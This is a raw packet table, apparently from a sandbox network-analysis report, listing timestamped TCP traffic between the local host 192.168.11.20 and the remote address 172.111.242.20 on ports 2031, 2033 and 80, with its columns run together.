                                                                            Mar 21, 2022 14:46:38.163944006 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.167546988 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.167917013 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.168225050 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.170412064 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.170475006 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.170522928 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.170804977 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.174105883 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.174170017 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.174217939 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.174267054 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.174315929 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.174333096 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.174386024 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.174468994 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.175774097 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.179398060 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.179665089 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.181322098 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.181389093 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.181437016 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.181484938 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.181531906 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.181576014 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.181631088 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.185714960 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.185976028 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.186861038 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.188345909 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.188437939 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.188488960 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.188585997 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.188643932 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.190243959 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.190309048 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.190357924 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.190556049 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.190795898 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.191026926 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.191631079 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.192471027 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.192755938 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.194730997 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.194796085 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.195022106 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.195714951 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.200433969 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.200797081 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.202821016 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.202888966 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.203115940 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.207603931 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.207700014 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.207750082 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.207797050 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.208018064 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.208261967 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.208420038 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.208647013 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.563164949 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:38.607750893 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:38.741695881 CET4976280192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:39.045145988 CET4976280192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:39.279041052 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:39.326245070 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:39.654340029 CET4976280192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:40.584228039 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:40.638394117 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:40.675703049 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:40.716694117 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:40.857212067 CET4976280192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.006170988 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.049863100 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.049930096 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.049979925 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.050111055 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.051246881 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.051310062 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.051460028 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.053529978 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.053594112 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.053744078 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.055633068 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.055845022 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.058554888 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.059151888 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.059214115 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.059262037 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.059348106 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.059401035 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.059403896 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.061558962 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.061623096 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.061796904 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.063158035 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.063221931 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.063385010 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.065201044 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.065437078 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.066363096 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.066426039 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.066652060 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.069389105 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.071892977 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.071955919 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.072098017 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.072737932 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.072808981 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.072948933 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.074738026 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.074951887 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.076133966 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.076199055 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.076247931 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.076296091 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.076414108 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.076477051 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.076947927 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.080266953 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.080650091 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.087764978 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.088241100 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.088526964 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.091810942 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.092211008 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.092458010 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.098440886 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.098510981 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.098781109 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.102755070 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.107218027 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.107569933 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.114166021 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.114228010 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.114279032 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.114418983 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.118784904 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.118848085 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.118896961 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.119023085 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.119069099 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.119501114 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.125224113 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.125292063 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.125438929 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.126347065 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126442909 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126514912 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126581907 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126589060 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.126631975 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126699924 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126739025 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.126746893 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126796007 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.126800060 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.126952887 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.127504110 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.127567053 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.127614975 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.127661943 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.127712011 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.127774954 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.127883911 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.127922058 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.127922058 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.128029108 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.128237963 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.128922939 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.128993988 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.129056931 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.129241943 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.139009953 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.139071941 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.139123917 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.139236927 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.139283895 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.140295029 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.140367031 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.140434027 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.140587091 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.143608093 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.143671036 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.143721104 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.143826962 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.143873930 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.145091057 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.145153046 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.145201921 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.145402908 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.148386955 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.148447037 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.148495913 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.148622036 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.148668051 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.150001049 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.150062084 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.150110006 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.150209904 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.150247097 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.150389910 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.151498079 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.151561975 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.151611090 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.151649952 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.151773930 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.151819944 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.754204035 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.840015888 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.840244055 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:41.893146038 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:41.935101032 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:42.972420931 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:43.073296070 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:43.073679924 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:43.159951925 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:43.278539896 CET4976280192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:44.367662907 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:44.925596952 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:44.981204987 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:48.080830097 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:48.089998007 CET4976280192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:48.178556919 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:53.439680099 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:53.527096987 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:57.697305918 CET4976280192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:04.937031984 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:04.992594004 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:05.032980919 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:05.116580963 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:24.956836939 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:25.003774881 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:25.056031942 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:25.139333010 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:25.679390907 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:25.722253084 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:26.745614052 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:26.843619108 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:26.843832016 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:26.887223005 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:26.940912008 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:27.992347956 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:28.083601952 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:28.083734989 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:28.178500891 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:44.973098040 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:47:45.014921904 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:45.143462896 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:47:45.234577894 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:04.974621058 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:05.026201010 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:05.072743893 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:05.167642117 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:10.674160957 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:10.727963924 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:11.744654894 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:11.830929995 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:11.831141949 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:11.878952980 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:11.930907965 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:12.971515894 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:13.063385010 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:13.063667059 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:13.155776978 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:24.974273920 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:25.021802902 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:25.102324009 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:25.195344925 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:44.988658905 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:45.033082008 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:45.111074924 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:45.205662012 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:55.680556059 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:55.733795881 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:56.783795118 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:56.871139050 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:56.871351004 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:56.914709091 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:56.968035936 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:57.984905005 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:58.078222990 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:48:58.078460932 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:48:58.174789906 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:05.001513958 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:05.044137001 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:05.095321894 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:05.190687895 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:25.014569044 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:25.070904970 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:25.109750986 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:25.200973988 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:40.683537960 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:40.723583937 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:41.846750975 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:41.944242954 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:41.944447994 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:41.990529060 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:42.036067009 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:43.094240904 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:43.181235075 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:43.181449890 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:43.272361994 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:45.023402929 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:49:45.066622019 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:45.123105049 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:49:45.211370945 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:05.036798000 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:05.077805042 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:05.224206924 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:05.317138910 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:25.038602114 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:25.088887930 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:25.133586884 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:25.228720903 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:25.691834927 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:25.745033026 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:26.769999027 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:26.854583979 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:26.854899883 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:26.898169041 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:26.947909117 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:27.969939947 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:28.055175066 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:28.055716038 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:28.149705887 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:44.428498030 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:44.513024092 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:45.046574116 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:50:45.100048065 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:45.136226892 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:50:45.222635984 CET203149761172.111.242.20192.168.11.20
                                                                            TimestampSource PortDest PortSource IPDest IP
